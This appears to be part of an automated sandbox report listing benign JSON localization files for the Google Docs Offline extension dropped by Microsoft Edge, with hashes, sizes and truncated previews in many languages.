                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):907
                                                                                                                                                                                                                                                                              Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):914
                                                                                                                                                                                                                                                                              Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):937
                                                                                                                                                                                                                                                                              Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1337
                                                                                                                                                                                                                                                                              Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                              MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                              SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                              SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                              SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2846
                                                                                                                                                                                                                                                                              Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                              MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                              SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                              SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                              SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):934
                                                                                                                                                                                                                                                                              Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                              MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                              SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                              SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                              SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):963
                                                                                                                                                                                                                                                                              Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                              MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                              SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                              SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                              SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1320
                                                                                                                                                                                                                                                                              Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                              MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                              SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                              SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                              SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):884
                                                                                                                                                                                                                                                                              Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                              MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                              SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                              SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                              SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):980
                                                                                                                                                                                                                                                                              Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1941
                                                                                                                                                                                                                                                                              Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1969
                                                                                                                                                                                                                                                                              Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1674
                                                                                                                                                                                                                                                                              Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1063
                                                                                                                                                                                                                                                                              Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1333
                                                                                                                                                                                                                                                                              Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1263
                                                                                                                                                                                                                                                                              Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1074
                                                                                                                                                                                                                                                                              Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                              MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                              SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                              SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                              SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):879
                                                                                                                                                                                                                                                                              Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                              MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                              SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                              SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                              SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1205
                                                                                                                                                                                                                                                                              Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                              MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                              SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                              SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                              SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):843
                                                                                                                                                                                                                                                                              Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                              MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                              SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                              SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                              SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                              Malicious:false
